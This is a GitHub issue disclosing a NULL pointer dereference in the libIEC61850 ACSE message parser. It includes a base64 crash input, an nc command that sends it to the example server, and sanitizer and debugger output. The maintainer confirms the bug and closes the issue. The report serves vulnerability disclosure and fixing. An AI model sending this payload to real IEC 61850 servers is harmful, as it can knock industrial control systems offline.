Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NULL Pointer Dereference in AcseConnection_parseMessage #368

Closed
AiDaiP opened this issue Dec 23, 2021 · 1 comment
Closed

NULL Pointer Dereference in AcseConnection_parseMessage #368

AiDaiP opened this issue Dec 23, 2021 · 1 comment

Comments

@AiDaiP
Copy link

@AiDaiP AiDaiP commented Dec 23, 2021

NULL Pointer Dereference in AcseConnection_parseMessage

Description

A NULL Pointer Dereference was discovered in AcseConnection_parseMessage at src/mms/iso_acse/acse.c:429. The vulnerability causes a segmentation fault and application crash.

version

8eeb6f0

System information
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

Proof of Concept

poc

base64 poc
AwAAFgLwgA0NAQDBATGBAgABogIAAA==

command:

./server_example_basic_io
nc 0.0.0.0 102 < poc

Result

./server_example_basic_io
Using libIEC61850 version 1.5.0
Connection opened
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4028537==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55de6e46db68 bp 0x7fac36efcaa0 sp 0x7fac36efc9f0 T3)
==4028537==The signal is caused by a READ memory access.
==4028537==Hint: address points to the zero page.
    #0 0x55de6e46db67 in AcseConnection_parseMessage src/mms/iso_acse/acse.c:429
    #1 0x55de6e41960b in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:233
    #2 0x55de6e41ac5d in handleTcpConnection src/mms/iso_server/iso_connection.c:472
    #3 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
    #4 0x7fac3b5bb292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_acse/acse.c:429 in AcseConnection_parseMessage
Thread T3 created by T1 here:
    #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
    #2 0x55de6e41b4f7 in IsoConnection_start src/mms/iso_server/iso_connection.c:581
    #3 0x55de6e417bf1 in handleIsoConnections src/mms/iso_server/iso_server.c:520
    #4 0x55de6e417c99 in isoServerThread src/mms/iso_server/iso_server.c:554
    #5 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477

Thread T1 created by T0 here:
    #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
    #2 0x55de6e4182d2 in IsoServer_startListening src/mms/iso_server/iso_server.c:682
    #3 0x55de6e3b9b50 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:606
    #4 0x55de6e3adae9 in IedServer_start src/iec61850/server/impl/ied_server.c:692
    #5 0x55de6e39537e in main /root/disk2/fuzzing/libiec61850/test/libiec61850/examples/server_example_basic_io/server_example_basic_io.c:146
    #6 0x7fac3b4c00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

==4028537==ABORTING

gdb

Using libIEC61850 version 1.5.0
[New Thread 0x7ffff3bff700 (LWP 4048010)]
[New Thread 0x7ffff33fe700 (LWP 4048011)]
Connection opened
[New Thread 0x7ffff2bfd700 (LWP 4048307)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff2bfd700 (LWP 4048307)]
0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
429         uint8_t messageType = buffer[bufPos++];
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff2bfca20 ◂— 0x41b58ab3
 RCX  0x0
 RDX  0x0
 RDI  0x7ffff2bfca80 —▸ 0x7ffff2bfce60 ◂— 0x0
 RSI  0x0
 R8   0x0
 R9   0x32
 R10  0x40
 R11  0x0
 R12  0xffffe57f944 ◂— 0x0
 R13  0x7ffff2bfca20 ◂— 0x41b58ab3
 R14  0x7ffff2bfcb40 ◂— 0x41b58ab3
 R15  0x7ffff2bfcf80 ◂— 0x0
 RBP  0x7ffff2bfcaa0 —▸ 0x7ffff2bfce80 —▸ 0x7ffff2bfceb0 ◂— 0x0
 RSP  0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
 RIP  0x555555661b68 (AcseConnection_parseMessage+383) ◂— movzx  eax, byte ptr [rcx]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x555555661b68 <AcseConnection_parseMessage+383>    movzx  eax, byte ptr [rcx]
   0x555555661b6b <AcseConnection_parseMessage+386>    mov    byte ptr [rbp - 0x95], al
   0x555555661b71 <AcseConnection_parseMessage+392>    mov    ecx, dword ptr [rbp - 0x90]
   0x555555661b77 <AcseConnection_parseMessage+398>    mov    edx, dword ptr [rbp - 0x8c]
   0x555555661b7d <AcseConnection_parseMessage+404>    lea    rsi, [rdi - 0x40]
   0x555555661b81 <AcseConnection_parseMessage+408>    mov    rax, qword ptr [rbp - 0x88]
   0x555555661b88 <AcseConnection_parseMessage+415>    mov    rdi, rax
   0x555555661b8b <AcseConnection_parseMessage+418>    call   BerDecoder_decodeLength                <BerDecoder_decodeLength>

   0x555555661b90 <AcseConnection_parseMessage+423>    mov    dword ptr [rbp - 0x8c], eax
   0x555555661b96 <AcseConnection_parseMessage+429>    cmp    dword ptr [rbp - 0x8c], 0
   0x555555661b9d <AcseConnection_parseMessage+436>    jns    AcseConnection_parseMessage+448
       <AcseConnection_parseMessage+448>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libiec61850/test/libiec61850/src/mms/iso_acse/acse.c
   424
   425     int messageSize = message->size;
   426
   427     int bufPos = 0;
   428
 ► 429     uint8_t messageType = buffer[bufPos++];
   430
   431     int len;
   432
   433     bufPos = BerDecoder_decodeLength(buffer, &len, bufPos, messageSize);
   434
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp     0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
01:0008│         0x7ffff2bfc9f8 —▸ 0x608000004020 ◂— 0x0
02:0010│         0x7ffff2bfca00 —▸ 0x7ffff2bfcb40 ◂— 0x41b58ab3
03:0018│         0x7ffff2bfca08 —▸ 0xa2310146 ◂— 0x0
04:0020│         0x7ffff2bfca10 —▸ 0x100000000 ◂— 0x0
05:0028│         0x7ffff2bfca18 ◂— 0x0
06:0030│ rbx r13 0x7ffff2bfca20 ◂— 0x41b58ab3
07:0038│         0x7ffff2bfca28 —▸ 0x5555556d71d8 ◂— '1 32 4 7 len:431'
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x555555661b68 AcseConnection_parseMessage+383
   f 1   0x55555560d60c IsoConnection_handleTcpConnection+1422
   f 2   0x55555560ec5e handleTcpConnection+43
   f 3   0x7ffff7564609 start_thread+217
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at
 src/mms/iso_acse/acse.c:429
#1  0x000055555560d60c in IsoConnection_handleTcpConnection (self=0x61100000ff40, isSingleThread=false) at src/mms/iso_server/iso_connection.c:233
#2  0x000055555560ec5e in handleTcpConnection (parameter=0x61100000ff40) at src/mms/iso_server/iso_connection.c:472
#3  0x00007ffff7564609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#4  0x00007ffff733c293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
@mzillgith
Copy link
Contributor

@mzillgith mzillgith commented Dec 23, 2021

Thanks for the bug reports. Is confirmed and should be fixed.

@mzillgith mzillgith closed this Jan 10, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants